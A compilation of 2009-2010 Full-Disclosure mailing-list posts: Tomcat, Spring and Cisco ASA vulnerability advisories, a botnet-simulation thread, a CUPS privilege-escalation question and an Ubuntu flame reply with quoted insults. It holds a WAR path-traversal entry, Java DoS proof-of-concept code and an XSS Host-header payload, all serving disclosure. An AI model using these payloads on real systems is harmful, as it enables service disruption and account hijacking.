On 25/02/10 22:28, John Q Public wrote: wtf is this. A centralized identity system? In an open source operating system? By default? You're going overboard here. You're just a rich trustfunder and your proles are afraid to say you're making a huge error. Just a tip: when you're giving advice that you want to be heard, try not to insult the other guy before you get to the advice ;-) I never asked for my OS to become this big chatroom filled with a bunch of autistic, idiotic facebook kids. I can't stand that. Look, you can't expect me to be accountable for who you follow on Twitter, or who your Facebook friends are. Nothing's going to show up on your desktop that you didn't sign up for. Ubuntu one? Chatroom accounts? Online, Invisible? You're turning the default Ubuntu into your huge autistic chatroom. We're bringing social interaction from the web, into the desktop. We're breathing life back into the city center, as it were. We're making the desktop more human. This is our mission, our reason for loving what we do. I'm sorry if it offends you, but it's got many people int he community very excited. There's no commercial conflict of interests here - we're putting it in by default purely to delight users. I accept that you're not delighted, but I don't see any signs that this won't be one of the favorite things about the release, for most users. If it turns out not to be the case, either before or after we make the release, we can course correct in six months time. Disable this, or name it teenbuntu. I'm not sure why you think you can issue orders to me. You are integrating this immature stuff into a Long Term Support version of Ubuntu. Yes. The Ubuntu team won't integrate it if they don't think it's ready. They wanted it for 9.10, but it wasn't ready. Now it may be so. Please do file bugs, and thank you for the feedback. If the general feedback we get, including yours, suggests it's not right or not ready, it won't ship. Desktop or not, I don't want to be forced into your schema and big brother social tray icon. Remove it by default. Make it available via the software center. Please fix this, you're making a big mistake. Other than that, I'm extremely excited for Lucid Lynx. Well, you can remove it yourself. And I won't be offended if you do. Thanks for the feedback, keep happy, Mark ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2009-2901 Apache Tomcat insecure partial deploy after failed undeploy
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2009-2901: Apache Tomcat insecure partial deploy after failed undeploy Severity: Low Vendor: The Apache Software Foundation Versions Affected: Tomcat 5.5.0 to 5.5.28 Tomcat 6.0.0 to 6.0.20 The unsupported Tomcat 3.x, 4.x and 5.0.x versions may be also affected. Description: By default, Tomcat automatically deploys any directories placed in a host's appBase. This behaviour is controlled by the autoDeploy attribute of a host which defaults to true. After a failed undeploy, the remaining files will be deployed as a result of the autodeployment process. Depending on circumstances, files normally protected by one or more security constraints may be deployed without those security constraints, making them accessible without authentication. Mitigation: 6.0.x users should upgrade to 6.0.24 or apply this patch: http://svn.apache.org/viewvc?rev=892815view=rev 5.5.x users should upgrade to 5.5.29 when released or apply this patch: http://svn.apache.org/viewvc?rev=902650view=rev Note: the patches also address CVE-2009-2693 and CVE-2009-2902. Alternatively, users of all Tomcat versions may mitigate this issue by manually ensuring that an undeploy removes all files. If one or more files cannot be deleted, it may be necessary to stop Tomcat before the files can be deleted. Credit: This issue was discovered by the Apache Tomcat security team References: [1] http://tomcat.apache.org/security.html Mark Thomas -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJLXMGYAAoJEBDAHFovYFnnwXgP/RAhAkPwPP9R3S5xM/mtZj+l cQacLI/8FdPOluVUIYNuPP2ti3v2STJyhUMOYVMQIpf7Why4fFiLaIOLZWDS04Gb UfTQfcFIQlh69h3xQBgkEeSHNegxGLRvl8sLrhLTmaLug4qn8JW81sZnO+9PejmD CgZKCq2ALqIvNmEU7nZTz/5xzll88O+b8P5UQqDGM9r1Z8fO8oCUood1n2hVdZAb PoLn7CKqMtb2psGvYWqYDNeB5mRVhHnqUdtQzQy3Sy6C8YBxkmm9HWOZjoAvjMaa X4N5THNyhXwdfNo9r6CClEiaQM6AK+jRl8SyeNiGNgNHT3Knhn9ANVUcRomRXgJm dsKKz0wBN/zVp7ux5FLlK9O/a7VNniYMFRwg71Na9KQY6/oRlxpOU9zgWqI9Co9V LD8g0EWliabOCv3nREDYqwrJq75ffS5TwK8mqWNlW/0gszDex34kVqnS06hMY1HT OK5Ip1cYhUZLlcfwkmN6tBxBozCteO/Nrfh6HEahc0MXVJXbZxDXLvWtDNSrBMSY Hqt9suXYom1rCxtFdBDtgXctAnB4UrADRxC4w/e7kZ+v3MRMtzl1UG/6cJDQtQ9f Iwt51lECjIW6LqEpSIMTs/v5h9ueSPhY/n7GWNloSqCUgA0XL5sw5lYkGsMmS4Sh dkab23FgmsfqGqZYUGzv =vcr6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2009-2693 Apache Tomcat unexpected file deletion and/or alteration
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2009-3548: Apache Tomcat unexpected file deletion and/or alteration Severity: Low Vendor: The Apache Software Foundation Versions Affected: Tomcat 5.5.0 to 5.5.28 Tomcat 6.0.0 to 6.0.20 The unsupported Tomcat 3.x, 4.x and 5.0.x versions may be also affected. Description: When deploying WAR files, the WAR files were not checked for directory traversal attempts. This allows an attacker to create arbitrary content outside of the web root. Mitigation: 6.0.x users should upgrade to 6.0.24 or apply this patch: http://svn.apache.org/viewvc?rev=892815view=rev 5.5.x users should upgrade to 5.5.29 when released or apply this patch: http://svn.apache.org/viewvc?rev=902650view=rev Note: the patches also address CVE-2009-2901 and CVE-2009-2902. Alternatively, users of all Tomcat versions may mitigate this issue by manually validating the contents of untrusted WAR files before deployment. Example: A WAR file that contains the following entry will overwrite the standard Windows start-up script when deployed on a default Tomcat installation: ../../bin/catalina.bat Credit: This issue was reported to the Apache Tomcat security team by Marc Schoenefeld of the Red Hat Security Response Team References: [1] http://tomcat.apache.org/security.html Mark Thomas -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJLXMF6AAoJEBDAHFovYFnniGcP/j9ZyFlLdzcTxJLqqWyAOdUt J1jF8vZTIqkf/vFyrRxLgw9ihaKZQ1wpd9U3vdHulcIsuAeBtiZgIhlXKItJiTLf ImsEl5a3w3Ucp2Z71/IIRxmcffz/zIjgdzmhmnRDEhiHz/wiygpRr7X1M8ZgZVXe itxFDhZu7ccWDTwUkxOoFuG6CWxb6/red3l5CaL4OtcWBTZ1aqQ5M1Io62pWErLI 6F/xuGTvWn4AeXaNEgJOGFZLLyX06WQJSzaJXh/tPqI153mk5Or63m03uJy9wHqa p7ULRvRNSZ57m8L08e397uCjvu4CPGf1Rm0dDDART7UaLF1Q13gP9O6DPCS88wN+ ypgZTERSG9t0iMHZCKNjH1huRJDVPkEJwvGdtH0wGzFwg5S+oJ/J5ETW29dQ/JUR pt1U1Xz6RnzFFgQR4Xomdc4SPysDFOIAexi8dkZPDcafN7YyiMQTRyU3iNRuoaR1 Y32qWfqJrmVDWQ1J4BLYsrLrpgZ0s5ccq6omz36lbH+3blyVPf1th84lWg9GG6lo W3qsnJIpNfxLi9II9sDxbVpUJXLVbJmBexUDR3z9BayowNtBlwMWXEZluctGe2DO hIkNB0D33AJvMD7wY80tnXY/hH3X5Vs+ZePEmu7TQB1KXzTinEbVdNVPF8/8woaL 7iN004jxhnUxQc8Fgwj4 =/B5h -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2009-2902 Apache Tomcat unexpected file deletion in work directory
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2009-2902: Apache Tomcat unexpected file deletion in work directory Severity: Low Vendor: The Apache Software Foundation Versions Affected: Tomcat 5.5.0 to 5.5.28 Tomcat 6.0.0 to 6.0.20 The unsupported Tomcat 3.x, 4.x and 5.0.x versions may be also affected. Description: When deploying WAR files, the WAR file names were not checked for directory traversal attempts. This allows an attacker to cause the deletion of the current contents of the host's work directory which may cause problems for currently running applications. Mitigation: 6.0.x users should upgrade to 6.0.24 or apply this patch: http://svn.apache.org/viewvc?rev=892815view=rev 5.5.x users should upgrade to 5.5.29 when released or apply this patch: http://svn.apache.org/viewvc?rev=902650view=rev Note: the patches also address CVE-2009-2693 and CVE-2009-2901. Alternatively, users of all Tomcat versions may mitigate this issue by manually validating the contents of untrusted WAR files before deployment. Example: Deploying and undeploying a WAR named ...war causes the all files and subdirectories in work/engine name/host name to be removed. Credit: This issue was discovered by the Apache Tomcat security team References: [1] http://tomcat.apache.org/security.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJLXMGKAAoJEBDAHFovYFnnU3sP/2qKA+k8nmXoowqeUKfgTZyg EJAtLvuTHFViDFeA7tDrh18pMzWUfPCu/sU8qXaiY71Dw6Fa8zcJ1SksP/WB4jmN UDuSj9vm5INxjbANnniSpZ5+tfLukPz9I3vFIIpmT4xO2aGnbqTUWPmVb2Oitapp ePH35D0OldLIL8O4TmdTK5LPw/qufbvEtegTlryJeyO9kWvqmK54W2cs60i+txiD zwzoRJgmNd7e/DS8+jrGrSFgLiFQlEQraQ99OvvU9bi7DofEUA1HuxPV94Ck8oMc xbcNlAgSMuqc0PuIff68rXP3M/4M96j/BFRRLsAqUPfXBZQBZ6vc/uOVG2JriIQU psksw1zTf8pbUTtuY6EUry3SspTHWcMGJfoxtrXa0nVxGnTg5XI/joipbCbbcF6p 0npKt3IIEH6JYtZ2DbSO0w6QjFnCVV5v0mB1LrMQDy0SzfcYf6G0MnmD6hLYNsdz 83TRgicGCfcSqZdiZDJ2Kngwnjl/oHYx2A1SVOc4q0NoIlFnzF9qMqiLM5hM87LT 3FaFsDmeFwhUxo4JRGAFA+ft1UrYufCvCQy+ZW6fxPIW2Qz9aEq63MDVojdd2yf7 Z9JApNAiO6q1cJukOaworJiv1cbcZHp0SaWDJQIo4VFT2APD2DFU79vCseIusX4e jcy9btzWclss+2hAA/XQ =kJa8 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google today
I think it means you need to stop using IE. :) Seriously, when I go there, everything looks normal. MJ Thor (Hammer of God) t...@hammerofgod.com 1/15/2010 14:20 I know google likes to do clever Today themes, but what's this one supposed to mean? :D Timothy (Thor) Mullen t...@hammerofgod.com www.hammerofgod.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TomaHawk IPS testing tool + [files]
Alo , Does any1 know where i can down the original install scripts? 1) qa.tgz 2) pcaps.tgz 3) www.tgz I have this mirror , but don't have the www.tgz file, works files... http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/t/to/tomahawk/ About the tomahawk's page, must follow these intruscciones: http://www.tomahawktesttool.org/install.html I have a Fedora10 Virtual box if any1 have more experience using this tool over vmware, please postme Also, if any1 know a best tool to stress a IDS/IPS as tomahawk? more efficient? please postme.. -mark :-) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] apache and squid dos
$php -f dos.php 1 localhost PHP Fatal error: Call to undefined function pcntl_fork() in C:\Users\Administrador\Desktop\dos.php on line 68 Mmm it not works! :-/ -mark 2009/6/20 Lolek of TK53 lolek1...@googlemail.com On Fri, Jun 19, 2009 at 8:00 PM, evilrabbievilra...@gmail.com wrote: Exploit for new apache and squid dos mentioned on sans.. ?php /* DOS for the vulnerbility at http://isc.sans.org/diary.html?storyid=6601 I wrote it in PHP because I find it funny to make PHP attack apache... I set it at 200 processes and it kill my test servers pretty quick. have fun kiddiez... Congratulations! You successfully converted (well partially) a perl script to PHP as well as successfully proving that you're a lame moron. - lolek ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] *REMINDER* OWASP AppSec DC 2009 CALL FOR PAPERS
Just a reminder that you only have 1 more week to submit for the OWASP AppSec DC 09 Conference. You too can be a part of the Premier Application Security Conference in the US for 2009. See the message below. On Tue, Apr 28, 2009 at 12:00 PM, Mark Bristow mark.bris...@owasp.orgwrote: Colleagues, OWASP is currently soliciting papers for the OWASP AppSec DC 2009 Conference that will take place at the Walter E. Washington Convention Center in Washington, DC on November 10th through 13th of 2009. There will be training courses on November 10th and 11th followed by plenary sessions on the 12th and 13th with each day having at least three tracks. AppSec DC may also have BOF, break out, or speed talks in addition to the standard schedule depending on the submissions we receive. We are seeking people and organizations that want to present on any of the following topics (in no particular order): - Business Risks with Application Security. - Starting and Managing Secure Development Lifecycle Programs. - Web Services-, XML- and Application Security. - Metrics for Application Security. - Application Threat Modeling. - Hands-on Source Code Review. - Web Application Security Testing. - OWASP Tools and Projects. - Secure Coding Practices (J2EE/.NET). - Privacy Concerns with Applications and Data Storage - Web Application Security countermeasures - Technology specific presentations on security such as AJAX, XML, etc. - Anything else relating to OWASP and Application Security. To make a submission you must include : - Presenter(s) name(s) - Presenter(s) Email and/or Phone number(s) - Presenter(s) bio(s) - Title - Abstract - Any supporting research/tools (will not be released outside of CFP committee) Submission deadline is June 15th 2009 at 11:59 PM Eastern Standard Time. Submit Proposals To mark.bristow(at)owasp.org with the subject line APPSEC DC CFP SUBMISSION (an automated filter is used). Additional information can be found in the FAQ. Conference Website: https://www.owasp.org/index.php/OWASP_AppSec_DC_2009 FAQ: https://www.owasp.org/index.php/OWASP_AppSec_DC_2009_-_FAQ CFP w/ FAQ: http://www.owasp.org/images/6/65/AppSec_DC_2009_CFP.pdf Please forward to all interested practitioners and colleagues. Regards, -- Mark Bristow OWASP Global Conferences Committee member - https://www.owasp.org/index.php/Global_Conferences_Committee AppSec DC 09 Organizer - https://www.owasp.org/index.php/OWASP_AppSec_DC_2009 OWASP DC Chapter Co-Chair - http://www.owasp.org/index.php/Washington_DC -- Mark Bristow OWASP Global Conferences Committee member - https://www.owasp.org/index.php/Global_Conferences_Committee AppSec DC 09 Organizer - https://www.owasp.org/index.php/OWASP_AppSec_DC_2009 OWASP DC Chapter Co-Chair - http://www.owasp.org/index.php/Washington_DC ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Howto Simulate a BotNet ?
Thanks for u response, any1 have the official link to down ns2 (win32/ Linux) -mark 2009/5/8 Shyaam shy...@gmail.com That is a nice tool as such. Many of my friends have tested it, and it is really cool. Shyaam On Fri, May 8, 2009 at 10:00 PM, Tomas L. Byrnes t...@byrneit.net wrote: Excuse the toppost: You might want to look into the work done @ SRI on the BotHunter project by Phil Porras, and Farnham Jahanian and others' work @ University of Michigan, which led to the creation of Arbor Networks. -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Jan G.B. Sent: Thursday, May 07, 2009 7:28 AM To: Mark Sec Cc: valdis.kletni...@vt.edu; Untitled Subject: Re: [Full-disclosure] Howto Simulate a BotNet ? 2009/5/7 Mark Sec mark@gmail.com: Well, Im looking info: 1) See all the traffic (Over botnet) 2) Administering many slaves (Lab) with the master (lab) via IRC, web, etc... 3) Probe attacks DDoS and DoS (Lab) 4) Probe remote and Local Exploits 5) Infected via remote iframe, exploit, XSS etc. any1 ? -Mark :-) Sounds to me, like you're about to test your botnet client in a virtual environment. 2009/5/6 Aadil Noorkhan a.noork...@linkbynet.com Hello, The closest I could find are: - http://pages.cs.wisc.edu/%7Epb/botnets_final.pdf (rather interesting paper about an inside look at botnets) - http://www.breakingpointsystems.com/community/blog/botnet- simulation (video about a botnet simulation by BreakingPointSystems) Cheers, Aadil. On Thu, 2009-05-07 at 05:36 +0400, valdis.kletni...@vt.edu wrote: On Wed, 06 May 2009 18:07:48 CDT, Mark Sec said: Does any1 know a tool. squema, info or ideas to simulate a Botnet? Ideas: A) Many Vmware (workstations) over win32 B) Make a fake traffic C) Make a scripts to simulate many hosts D) IDS/ IPS (to see the traffic) What behavior(s) of a botnet are you trying to simulate? There's a lot of approaches, as you've already noticed - which one will work best will depend a lot on what you're trying to do. -- Aadil NOORKHAN Administrateur Unix -- LINKBYNET Indian Ocean BG Court, Route Saint-Jean, Quatre Bornes, Ile Maurice Tel direct : (+33) 01 48 13 21 78 Tel : (+33) 1 48 13 00 00 Fax : (+33) 1 48 13 31 21 Email : a.noork...@linkbynet.com Web : www.linkbynet.com __ Astreinte : http://www.linkbynet.com/astreinte/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Thank you in advance for your time and consideration. Kind Regards, Shyaam Sundhar R.S. Site: www.EvilFingers.com Certification History: Audit: GPCI Legal: GCDS Management: GLDR Security: SSP-CNSA, SSP-MPA, SSP-GHD, GREM, GHTQ, GWAS, GIPS, GCFA, GCIA, GCIH Anti-Terrorism: CAS ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Howto Simulate a BotNet ?
Well, Im looking info: 1) See all the traffic (Over botnet) 2) Administering many slaves (Lab) with the master (lab) via IRC, web, etc... 3) Probe attacks DDoS and DoS (Lab) 4) Probe remote and Local Exploits 5) Infected via remote iframe, exploit, XSS etc. any1 ? -Mark :-) 2009/5/6 Aadil Noorkhan a.noork...@linkbynet.com Hello, The closest I could find are: - http://pages.cs.wisc.edu/%7Epb/botnets_final.pdf (rather interesting paper about an inside look at botnets) - http://www.breakingpointsystems.com/community/blog/botnet-simulation (video about a botnet simulation by BreakingPointSystems) Cheers, Aadil. On Thu, 2009-05-07 at 05:36 +0400, valdis.kletni...@vt.edu wrote: On Wed, 06 May 2009 18:07:48 CDT, Mark Sec said: Does any1 know a tool. squema, info or ideas to simulate a Botnet? Ideas: A) Many Vmware (workstations) over win32 B) Make a fake traffic C) Make a scripts to simulate many hosts D) IDS/ IPS (to see the traffic) What behavior(s) of a botnet are you trying to simulate? There's a lot of approaches, as you've already noticed - which one will work best will depend a lot on what you're trying to do. -- Aadil NOORKHAN Administrateur Unix -- LINKBYNET Indian Ocean BG Court, Route Saint-Jean, Quatre Bornes, Ile Maurice Tel direct : (+33) 01 48 13 21 78 Tel : (+33) 1 48 13 00 00 Fax : (+33) 1 48 13 31 21 Email : a.noork...@linkbynet.com Web : www.linkbynet.com __ Astreinte : http://www.linkbynet.com/astreinte/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Howto Simulate a BotNet ?
Does any1 know a tool. squema, info or ideas to simulate a Botnet? Ideas: A) Many Vmware (workstations) over win32 B) Make a fake traffic C) Make a scripts to simulate many hosts D) IDS/ IPS (to see the traffic) -mark ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OWASP AppSec DC 2009 CALL FOR PAPERS
Colleagues, OWASP is currently soliciting papers for the OWASP AppSec DC 2009 Conference that will take place at the Walter E. Washington Convention Center in Washington, DC on November 10th through 13th of 2009. There will be training courses on November 10th and 11th followed by plenary sessions on the 12th and 13th with each day having at least three tracks. AppSec DC may also have BOF, break out, or speed talks in addition to the standard schedule depending on the submissions we receive. We are seeking people and organizations that want to present on any of the following topics (in no particular order): - Business Risks with Application Security. - Starting and Managing Secure Development Lifecycle Programs. - Web Services-, XML- and Application Security. - Metrics for Application Security. - Application Threat Modeling. - Hands-on Source Code Review. - Web Application Security Testing. - OWASP Tools and Projects. - Secure Coding Practices (J2EE/.NET). - Privacy Concerns with Applications and Data Storage - Web Application Security countermeasures - Technology specific presentations on security such as AJAX, XML, etc. - Anything else relating to OWASP and Application Security. To make a submission you must include : - Presenter(s) name(s) - Presenter(s) Email and/or Phone number(s) - Presenter(s) bio(s) - Title - Abstract - Any supporting research/tools (will not be released outside of CFP committee) Submission deadline is June 15th 2009 at 11:59 PM Eastern Standard Time. Submit Proposals To mark.bristow(at)owasp.org with the subject line APPSEC DC CFP SUBMISSION (an automated filter is used). Additional information can be found in the FAQ. Conference Website: https://www.owasp.org/index.php/OWASP_AppSec_DC_2009 FAQ: https://www.owasp.org/index.php/OWASP_AppSec_DC_2009_-_FAQ CFP w/ FAQ: http://www.owasp.org/images/6/65/AppSec_DC_2009_CFP.pdf Please forward to all interested practitioners and colleagues. Regards, -- Mark Bristow AppSec DC 09 - https://www.owasp.org/index.php/OWASP_AppSec_DC_2009 OWASP DC Chapter Co-Chair - http://www.owasp.org/index.php/Washington_DC OWASP GCC - https://www.owasp.org/index.php/Global_Conferences_Committee ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability
Severity: Low
Vendor: SpringSource
Versions Affected:
Spring Framework 1.1.0-2.5.6, 3.0.0.M1-3.0.0.M2
dm Server 1.0.0-1.0.2 (note 2.x not affected since dm Server 2.x requires a 1.6
JDK)
Description:
The j.u.r.Pattern.compile method in Sun 1.5 JDK has a problem ([1],[2]) with
exponential compilation times, when using optional groups. A workaround [3] was
implemented in 1.4.2_06 but the root cause of poor performance in regex
processing was not resolved until JDK 1.6.
JdkRegexpMethodPointcut calls Pattern.compile(source[i]); via it's inherited
readObject method (from AbstractRegexpMethodPointcut). When Sun JVM 1.5 driven
application with spring.jar in its classpath accepts serializable data, an
attacker could use a long regex string with many optional groups to consume
enormous CPU resources. And, with a few requests all listeners will be occupied
with compiling regex expressions forever.
Mitigation:
* Users of all products may upgrade to JRE/JDK 1.6 which includes the fix for
the root cause
* Spring Framework 2.5.6.SEC01 has been released for Community users that
includes a workaround to the root cause - see[4] for upgrade steps
* Spring Framework 2.5.6.SR02 is available for Enterprise users that includes a
workaround to the root cause; The software can be found in the Customer Portal
[5]
* Disable functionality that accepts serializable data from untrusted sources
* Spring Framework 3.0.0.M3 will be released shortly that includes a workaround
to the root cause
* dm Server 1.0.2 Community users may replace the Spring Framework 2.5.6 jar
with 2.5.6.SEC01 - see[4] for upgrade steps
* dm Server 1.0.3 that includes a workaround to the root cause will be released
shortly
* Instrumented Spring Framework 2.5.6.SR02 that includes a workaround to the
root cause will be released by April 27, 2009
Example:
public class DoSSpring {
static byte[] getSerialized(Object o) throws Exception {
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(o);
oos.flush();
oos.close();
return baos.toByteArray();
}
public static void main(String[] a) throws Exception{
String thePattern=(Y)?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y) +
?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)?(K) +
?(W)?(I)?(U)?(a)?$;
String longerPattern =
thePattern.substring(0,thePattern.length()-1)+thePattern;
int length = longerPattern.length();
String fakePattern = longerPattern.replaceAll(., A);
JdkRegexpMethodPointcut jrmp = new JdkRegexpMethodPointcut();
jrmp.setPattern(fakePattern);
System.out.println(jrmp);
byte[] theArray = getSerialized(jrmp);
int i = 0;
for (; i theArray.length;i++) {
if (((char)theArray[i])=='A' ((char)theArray[i+1]=='A')) {
break;
}
}
System.arraycopy(longerPattern.getBytes(), 0, theArray, i, length);
ByteArrayInputStream bis = new ByteArrayInputStream(theArray);
ObjectInputStream ois = new ObjectInputStream(bis);
Object o = ois.readObject(); // returns after a very very long time
}
}
Credit:
This issue was discovered by the RedHat Security Response Team
References:
[1]
http://www.packetstormsecurity.org/hitb06/DAY_1_-_Marc_Schoenefeld_-_Pentesting_Java_J2EE.pdf
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2540
[3] http://archive.cert.uni-stuttgart.de/uniras/2005/01/msg00035.html
[4] http://www.springsource.com/securityadvisory
[5] http://www.springsource.com/spring_account_file
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)
iEYEARECAAYFAknxfZcACgkQb7IeiTPGAkMX0gCdGsE5fqOd0PcMdcYrLTwyejGp
4p0An1Dwr9T+WsCwytVrztkskexVw84T
=zBj5
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cisco ASA5520 Web VPN Host Header XSS
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
This is the Cisco PSIRT response to an issue discovered and reported to
Cisco by Bugs NotHugs regarding a cross-site scripting vulnerability in
the
Cisco Adaptive Security Appliance (ASA) clientless SSL VPN feature.
Cisco
PSIRT greatly appreciates the opportunity to work with researchers on
security vulnerabilities, and welcomes the opportunity to review and
assist
in product reports. PSIRT would like to thank Bugs NotHugs for reporting
this issue to us.
Cisco has release an IntelliShield Alert on this vulnerability, which is
available at:
http://tools.cisco.com/security/center/viewAlert.x?alertId=17950. This
and
other IntelliShield Alerts are available off the Cisco Security Center
(www.cisco.com/security).
Cisco is currently patching this vulnerability as Cisco bug ID
CSCsy82093
and the fixes will be available in 8.0.3.31, 8.1.2.22, and 8.2.0. These
images will soon be available for download at either
http://www.cisco.com/cgi-bin/tablebuild.pl/asa or
http://www.cisco.com/cgi-bin/tablebuild.pl/asa-interim.
To check on the latest versions with fixed releases please consult the
Cisco Bug Toolkit
http://tools.cisco.com/Support/BugToolKit/action.do?hdnAction=searchBugs
.
- -Original Message-
From: Bugs NotHugs [mailto:bugsnoth...@gmail.com]
Sent: Tuesday, March 31, 2009 6:18 AM
To: bugtraq; fd
Subject: Cisco ASA5520 Web VPN Host Header XSS
- - Cisco ASA5520 Web VPN Host Header XSS
- - Description
Cross-site scripting.
- - Product
Cisco, ASA5520, IOS 7.2(2)22
- - PoC
Modified request:
POST /+webvpn+/index.html HTTP/1.1
Host: 'scriptalert('BugsNotHugs')/scriptmeta httpequiv=
content='www.owasp.org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://198.133.219.23/+webvpn+/index.html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR
1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66
username=psirtpassword=easyLogin=Loginnext=tgroup=tgcookieset=
Response:
HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1
Content-Length: 5556
html
!--
Copyright (c) 2004, 2005 by Cisco Systems, Inc.
All rights reserved.
--
head
META http-equiv=PICS-Label content='(PICS-1.1
http://www.rsac.org/ratingsv01.html; l gen true comment RSACi North
America Server for
http://;'scriptalert('BugsNotHugs')/scriptmeta httpequiv=
content='www.owasp.org/+webvpn+/index.html on
2000.11.02T23:36-0800 r (n 0 s 0 v 0 l 0))'
meta http-equiv=Window-target content=_top
titleWebVPN Service/title
- - Solution
None
- - Timeline
2007-09-17: Vulnerability Discovered
2008-02-15: Disclosed to Vendor (auto-reply)
2009-04-02: Disclosed to Public (XSS is so 1999)
- --
BugsNotHugs
Shared Vulnerability Disclosure Account
-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.9.0 (Build 397)
Charset: utf-8
wj8DBQFJ8dXP86n/Gc8U/uARAsAjAJwNOVQlrSq4+LtHjUh3ziZI24ikzgCfeccr
A139kRwCBvDNYK4EX0Wr30w=
=r3sK
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CUPS port 631 how to hack
Alo, Well, I have a CUPS opened on the port 631, I have access to administration pages Does any1 have tricks/tips to elevate local privilegies? -mark ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
